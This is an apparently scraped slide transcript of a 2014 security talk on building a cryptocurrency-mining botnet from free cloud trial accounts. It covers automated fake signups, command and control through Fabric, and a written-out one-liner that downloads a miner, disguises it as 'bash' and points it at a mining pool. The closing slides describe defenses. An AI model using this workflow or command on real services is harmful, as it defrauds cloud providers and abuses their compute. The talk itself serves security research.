cloudbots - harvesting crypto currency like a botnet farmer
DESCRIPTION
What happens when computer criminals start using friendly cloud services for malicious activities? In this presentation, we explore how to (ab)use free trials to get access to vast amounts of computing power, storage, and pre-made hacking environments. Oh! Also, we violate the hell out of some terms of service. We explore just how easy it is to generate massive amounts of unique email addresses; in order to register free trial accounts, deploy code, and distribute commands (C2). We managed to build this cloud-based botnet all for the low cost of $0 and semi-legally. This botnet doesn't get flagged as malware, blocked by web filters, or get taken over. This is the stuff of nightmares! While riding on the fluffy Kumobot (kumo means cloud in Japanese), it was discovered that we were not the only ones doing this! With the rise of crypto currency we now face the impending rise of botnets that mine for digital gold on someone else's systems with someone else's dime footing the electric bill. Through our efforts in building a cloud-based botnet we built enough tools to share a framework for penetration testers and security researchers. The anti-anti-automation framework will show those tasked with defense exactly what it looks like when their free trial gets assaulted.TRANSCRIPT
![Page 1: CloudBots - Harvesting Crypto Currency Like a Botnet Farmer](https://reader035.vdocuments.site/reader035/viewer/2022081801/546e997aaf79597b298b57ce/html5/thumbnails/1.jpg)
CloudBots: Harvesting Crypto Coins Like a Botnet Farmer
2014 August 6
![Page 2: CloudBots - Harvesting Crypto Currency Like a Botnet Farmer](https://reader035.vdocuments.site/reader035/viewer/2022081801/546e997aaf79597b298b57ce/html5/thumbnails/2.jpg)
2
…and Violating Terms of Service
Building a Botnet with Free Cloud-based Services
![Page 3: CloudBots - Harvesting Crypto Currency Like a Botnet Farmer](https://reader035.vdocuments.site/reader035/viewer/2022081801/546e997aaf79597b298b57ce/html5/thumbnails/3.jpg)
3
Main Topics • Could we build a botnet from freely available cloud
services? • Will we see the rise of more cloud based botnets? • Should insufficient anti-automation be considered a
top ten vulnerability?
What are these guys talking about?
Overview
![Page 4: CloudBots - Harvesting Crypto Currency Like a Botnet Farmer](https://reader035.vdocuments.site/reader035/viewer/2022081801/546e997aaf79597b298b57ce/html5/thumbnails/4.jpg)
4
Platform as a Service
Cloud PaaS
![Page 5: CloudBots - Harvesting Crypto Currency Like a Botnet Farmer](https://reader035.vdocuments.site/reader035/viewer/2022081801/546e997aaf79597b298b57ce/html5/thumbnails/5.jpg)
5
Platform as a Service
Free Cloud Services
<Insert with other providers later>
Reference: http://goo.gl/AZ4nYp
![Page 6: CloudBots - Harvesting Crypto Currency Like a Botnet Farmer](https://reader035.vdocuments.site/reader035/viewer/2022081801/546e997aaf79597b298b57ce/html5/thumbnails/6.jpg)
6
Development Environment as a Service
Free Cloud Services
![Page 7: CloudBots - Harvesting Crypto Currency Like a Botnet Farmer](https://reader035.vdocuments.site/reader035/viewer/2022081801/546e997aaf79597b298b57ce/html5/thumbnails/7.jpg)
AUTOMATION Scripting the Cloud
![Page 8: CloudBots - Harvesting Crypto Currency Like a Botnet Farmer](https://reader035.vdocuments.site/reader035/viewer/2022081801/546e997aaf79597b298b57ce/html5/thumbnails/8.jpg)
8
Automating Registration • Hurdles - Email address confirmation
- CAPTCHA
- Phone/SMS
- Credit Card
Usability vs Security
Cloud Providers (In)Security
![Page 9: CloudBots - Harvesting Crypto Currency Like a Botnet Farmer](https://reader035.vdocuments.site/reader035/viewer/2022081801/546e997aaf79597b298b57ce/html5/thumbnails/9.jpg)
9
Anti-Automation
Fraudulent Account Registration
More Anti-Automation
Email Confirmation Only
66%
33%
EMAIL CAPTCHA CREDIT CARD PHONE
![Page 10: CloudBots - Harvesting Crypto Currency Like a Botnet Farmer](https://reader035.vdocuments.site/reader035/viewer/2022081801/546e997aaf79597b298b57ce/html5/thumbnails/10.jpg)
10
Anti-Automation Techniques • Email address confirmation • CAPTCHA • Phone/SMS • Credit Card
Usability vs Security
Cloud Providers (In)Security
![Page 11: CloudBots - Harvesting Crypto Currency Like a Botnet Farmer](https://reader035.vdocuments.site/reader035/viewer/2022081801/546e997aaf79597b298b57ce/html5/thumbnails/11.jpg)
11
![Page 12: CloudBots - Harvesting Crypto Currency Like a Botnet Farmer](https://reader035.vdocuments.site/reader035/viewer/2022081801/546e997aaf79597b298b57ce/html5/thumbnails/12.jpg)
12
Automated email processing - Wildcard localpart
*@domain.com
- Extract important information from incoming emails
- Grep for confirmation token links and request them
Account registration - Automatic request sent to
account activation links
SMTP Services
Email Confirmation Token Processing
![Page 13: CloudBots - Harvesting Crypto Currency Like a Botnet Farmer](https://reader035.vdocuments.site/reader035/viewer/2022081801/546e997aaf79597b298b57ce/html5/thumbnails/13.jpg)
[email protected] Email Address Anatomy
![Page 14: CloudBots - Harvesting Crypto Currency Like a Botnet Farmer](https://reader035.vdocuments.site/reader035/viewer/2022081801/546e997aaf79597b298b57ce/html5/thumbnails/14.jpg)
14
Using the Google AppEngine InboundMailHandler - [email protected] - [email protected] - [email protected] - [email protected] - [email protected] - [email protected] - [email protected] - [email protected] - [email protected] - [email protected]
Google App Engine
Detection issues
![Page 15: CloudBots - Harvesting Crypto Currency Like a Botnet Farmer](https://reader035.vdocuments.site/reader035/viewer/2022081801/546e997aaf79597b298b57ce/html5/thumbnails/15.jpg)
15
Unlimited usernames - Prevent pattern recognition
- Pull from real world examples
[local-part from dump]@domain.tld
Realistic Randomness
Real Email Addresses
![Page 16: CloudBots - Harvesting Crypto Currency Like a Botnet Farmer](https://reader035.vdocuments.site/reader035/viewer/2022081801/546e997aaf79597b298b57ce/html5/thumbnails/16.jpg)
16
Unlimited domains - freedns.afraid.org - Prevent detection
- Thousands of unique email domains
SMTP Services
Plethora of Email Addresses
![Page 17: CloudBots - Harvesting Crypto Currency Like a Botnet Farmer](https://reader035.vdocuments.site/reader035/viewer/2022081801/546e997aaf79597b298b57ce/html5/thumbnails/17.jpg)
17
Unlimited email addresses
Free DNS Subdomains
![Page 18: CloudBots - Harvesting Crypto Currency Like a Botnet Farmer](https://reader035.vdocuments.site/reader035/viewer/2022081801/546e997aaf79597b298b57ce/html5/thumbnails/18.jpg)
18
What do we need? • Free email relay - Free MX registration
• Process wildcards - *@domain.tld
• Send unlimited messages - Unrestricted STMP to HTTP POST/
JSON requests
Free Signups
Receiving Email and Processing
![Page 19: CloudBots - Harvesting Crypto Currency Like a Botnet Farmer](https://reader035.vdocuments.site/reader035/viewer/2022081801/546e997aaf79597b298b57ce/html5/thumbnails/19.jpg)
19
Inbound Mail As A Service
Free Cloud Services
<Insert with other providers later>
Reference: http://goo.gl/yqoh6U
![Page 20: CloudBots - Harvesting Crypto Currency Like a Botnet Farmer](https://reader035.vdocuments.site/reader035/viewer/2022081801/546e997aaf79597b298b57ce/html5/thumbnails/20.jpg)
20
Automated email processing - Extract important information
from incoming emails
- Grep for confirmation token links and request them
Account registration - Automatic request sent to
account activation links
SMTP Services
Email Confirmation Token Processing
Reference: http://bishopfox.github.io/anti-anti-automation/
![Page 21: CloudBots - Harvesting Crypto Currency Like a Botnet Farmer](https://reader035.vdocuments.site/reader035/viewer/2022081801/546e997aaf79597b298b57ce/html5/thumbnails/21.jpg)
21
<Insert wall of random email addresses>
Realistic Randomness
Unique Email Addresses Avoid Pattern Recognition
![Page 22: CloudBots - Harvesting Crypto Currency Like a Botnet Farmer](https://reader035.vdocuments.site/reader035/viewer/2022081801/546e997aaf79597b298b57ce/html5/thumbnails/22.jpg)
DEMONSTRATION Automatic Account Creation
![Page 23: CloudBots - Harvesting Crypto Currency Like a Botnet Farmer](https://reader035.vdocuments.site/reader035/viewer/2022081801/546e997aaf79597b298b57ce/html5/thumbnails/23.jpg)
23
Automated Registration Workflow
Email Addresses
![Page 24: CloudBots - Harvesting Crypto Currency Like a Botnet Farmer](https://reader035.vdocuments.site/reader035/viewer/2022081801/546e997aaf79597b298b57ce/html5/thumbnails/24.jpg)
24
MongoDB
• MongoLab
• MongoHQ
Keeping track of all accounts
Storing Account Information
![Page 25: CloudBots - Harvesting Crypto Currency Like a Botnet Farmer](https://reader035.vdocuments.site/reader035/viewer/2022081801/546e997aaf79597b298b57ce/html5/thumbnails/25.jpg)
FUNTIVITIES Botnets Are Fun!
![Page 26: CloudBots - Harvesting Crypto Currency Like a Botnet Farmer](https://reader035.vdocuments.site/reader035/viewer/2022081801/546e997aaf79597b298b57ce/html5/thumbnails/26.jpg)
26
What can we do? • Distributed Network Scanning • Distributed Password Cracking • DDoS • Click-fraud • Crypto Currency Mining • Data Storage
Now we have a botnet! Fun!
Botnet Activities
![Page 27: CloudBots - Harvesting Crypto Currency Like a Botnet Farmer](https://reader035.vdocuments.site/reader035/viewer/2022081801/546e997aaf79597b298b57ce/html5/thumbnails/27.jpg)
27
Refer Fake Friends
Unlimited Storage Space
![Page 28: CloudBots - Harvesting Crypto Currency Like a Botnet Farmer](https://reader035.vdocuments.site/reader035/viewer/2022081801/546e997aaf79597b298b57ce/html5/thumbnails/28.jpg)
28
Refer Fake Friends
Unlimited Storage Space
![Page 29: CloudBots - Harvesting Crypto Currency Like a Botnet Farmer](https://reader035.vdocuments.site/reader035/viewer/2022081801/546e997aaf79597b298b57ce/html5/thumbnails/29.jpg)
29
What are we using? • Fabric - Fabric is a Python library and command-
line tool for streamlining the use of SSH for application deployment or systems administration tasks.
• fab check_hosts –P –z 20 • fab run_command
Botnet C2
Command & Control
![Page 30: CloudBots - Harvesting Crypto Currency Like a Botnet Farmer](https://reader035.vdocuments.site/reader035/viewer/2022081801/546e997aaf79597b298b57ce/html5/thumbnails/30.jpg)
30
Unique Amazon IP Addresses
Distributed Command
[na1.cloudbox.net:2352]: curl http://icanhazip.com 4.109.182.13 [eu1.cloudbox.net:3127]: curl http://icanhazip.com 126.34.56.254 [na1.cloudbox.net:10660]: curl http://icanhazip.com 58.251.42.128 [na1.cloudbox.net:15627]: curl http://icanhazip.com 74.216.236.72 [na1.cloudbox.net:8000]: curl http://icanhazip.com 28.228.253.19 [na1.cloudbox.net:4028]: curl http://icanhazip.com 64.216.37.252
![Page 31: CloudBots - Harvesting Crypto Currency Like a Botnet Farmer](https://reader035.vdocuments.site/reader035/viewer/2022081801/546e997aaf79597b298b57ce/html5/thumbnails/31.jpg)
31
Make money, money • Deploying miners • One command for $$$
All your processors are belong to us
Litecoin Mining
if [ ! -f bash ]; then wget http://sourceforge.net/projects/cpuminer/files/pooler-cpuminer-2.3.2-linux-x86_64.tar.gz && tar zxfv pooler-cpuminer-2.3.2-linux-x86_64.tar.gz && rm pooler-cpuminer-2.3.2-linux-x86_64.tar.gz && mv minerd bash; fi; screen ./bash –url=stratum+tcp://pool.mine-litecoin.com --userpass=ninja.47:47; rm bash
![Page 32: CloudBots - Harvesting Crypto Currency Like a Botnet Farmer](https://reader035.vdocuments.site/reader035/viewer/2022081801/546e997aaf79597b298b57ce/html5/thumbnails/32.jpg)
32
Load After Crypto Currency Mining
Distributed Command
ID | Host | Status ---------------------------------------- 0 | na1.cloudbox.net:1678 | 2 users, load average: 37.08, 37.60, 32.51 1 | na1.cloudbox.net:15121| 1 user, load average: 16.35, 15.35, 12.00 2 | na1.cloudbox.net:11631| 1 user, load average: 19.65, 18.46, 14.38 3 | na1.cloudbox.net:4358 | 2 users, load average: 23.10, 22.91, 18.95 4 | na1.cloudbox.net:1212 | 1 user, load average: 19.60, 18.47, 14.41 5 | na1.cloudbox.net:5841 | 1 user, load average: 19.97, 18.61, 14.52 6 | eu1.cloudbox.net:3025 | 1 user, load average: 19.27, 18.37, 14.33 7 | eu1.cloudbox.net:6892 | 2 users, load average: 19.65, 18.46, 14.38 8 | eu1.cloudbox.net:2038 | 1 user, load average: 18.85, 17.43, 13.45 9 | na1.cloudbox.net:5235 | 1 user, load average: 18.55, 17.32, 13.38 10 | na1.cloudbox.net:1122 | 1 user, load average: 26.04, 25.57, 20.02
![Page 33: CloudBots - Harvesting Crypto Currency Like a Botnet Farmer](https://reader035.vdocuments.site/reader035/viewer/2022081801/546e997aaf79597b298b57ce/html5/thumbnails/33.jpg)
33
All your processors are belong to us
Litecoin Mining
![Page 34: CloudBots - Harvesting Crypto Currency Like a Botnet Farmer](https://reader035.vdocuments.site/reader035/viewer/2022081801/546e997aaf79597b298b57ce/html5/thumbnails/34.jpg)
CLOUD BREAKOUT Bypassing Restrictions
![Page 35: CloudBots - Harvesting Crypto Currency Like a Botnet Farmer](https://reader035.vdocuments.site/reader035/viewer/2022081801/546e997aaf79597b298b57ce/html5/thumbnails/35.jpg)
DETECTION No one can catch a ninja!
![Page 36: CloudBots - Harvesting Crypto Currency Like a Botnet Farmer](https://reader035.vdocuments.site/reader035/viewer/2022081801/546e997aaf79597b298b57ce/html5/thumbnails/36.jpg)
36
Automatic Backups • Propagate to other similar services - e.g. MongoLab ß à MongoHQ
• Infrastructure across multiple service providers
• Easily migrated
Armadillo Up ™
Disaster Recovery Plan
![Page 37: CloudBots - Harvesting Crypto Currency Like a Botnet Farmer](https://reader035.vdocuments.site/reader035/viewer/2022081801/546e997aaf79597b298b57ce/html5/thumbnails/37.jpg)
RISING TREAD Active Attacks
![Page 38: CloudBots - Harvesting Crypto Currency Like a Botnet Farmer](https://reader035.vdocuments.site/reader035/viewer/2022081801/546e997aaf79597b298b57ce/html5/thumbnails/38.jpg)
38
Adaptation
Cloud Provider Registration
![Page 39: CloudBots - Harvesting Crypto Currency Like a Botnet Farmer](https://reader035.vdocuments.site/reader035/viewer/2022081801/546e997aaf79597b298b57ce/html5/thumbnails/39.jpg)
39
Adaptation
Cloud Provider Registration
![Page 40: CloudBots - Harvesting Crypto Currency Like a Botnet Farmer](https://reader035.vdocuments.site/reader035/viewer/2022081801/546e997aaf79597b298b57ce/html5/thumbnails/40.jpg)
40
Adaptation
Cloud Provider Registration
![Page 41: CloudBots - Harvesting Crypto Currency Like a Botnet Farmer](https://reader035.vdocuments.site/reader035/viewer/2022081801/546e997aaf79597b298b57ce/html5/thumbnails/41.jpg)
41
Crypto Coins & DDoS
Clouds Under Siege
![Page 42: CloudBots - Harvesting Crypto Currency Like a Botnet Farmer](https://reader035.vdocuments.site/reader035/viewer/2022081801/546e997aaf79597b298b57ce/html5/thumbnails/42.jpg)
42
Crypto Coins & DDoS
Clouds Under Siege
![Page 43: CloudBots - Harvesting Crypto Currency Like a Botnet Farmer](https://reader035.vdocuments.site/reader035/viewer/2022081801/546e997aaf79597b298b57ce/html5/thumbnails/43.jpg)
PROTECTION Bot Busters
![Page 44: CloudBots - Harvesting Crypto Currency Like a Botnet Farmer](https://reader035.vdocuments.site/reader035/viewer/2022081801/546e997aaf79597b298b57ce/html5/thumbnails/44.jpg)
44
What can we do? • Logic puzzles
• Sound output
• Credit card validation
• Live operators
• Limited-use account
• Heuristic checks
• Federated identity systems
Usability vs Security
Protection
Reference: http://www.w3.org/TR/2003/WD-turingtest-20031105/#solutions
![Page 45: CloudBots - Harvesting Crypto Currency Like a Botnet Farmer](https://reader035.vdocuments.site/reader035/viewer/2022081801/546e997aaf79597b298b57ce/html5/thumbnails/45.jpg)
45
What should we do? • Analyzing properties of Sybil
accounts
• Analyzing the arrival rate and distribution of accounts
• Flag accounts registered with emails from newly registered domain names
• Email verification
• CAPTCHAs
• IP Blacklisting
• Phone/SMS verification
• Automatic pattern recognition
At Abuse vs At Registration
Protection
Reference: https://www.usenix.org/system/files/conference/usenixsecurity13/sec13-paper_thomas.pdf
![Page 46: CloudBots - Harvesting Crypto Currency Like a Botnet Farmer](https://reader035.vdocuments.site/reader035/viewer/2022081801/546e997aaf79597b298b57ce/html5/thumbnails/46.jpg)
46
At Abuse vs At Registration
Protection
Advanced techniques • Signup flow events
- Detect common activities after signup
• User-agent - A registration bot may generate a different
user-agent for each signup or use uncommon user-agents
• Form submission timing - A bot that doesn't mimic human behavior by
performing certain actions too quickly can be detected
Reference: https://www.usenix.org/system/files/conference/usenixsecurity13/sec13-paper_thomas.pdf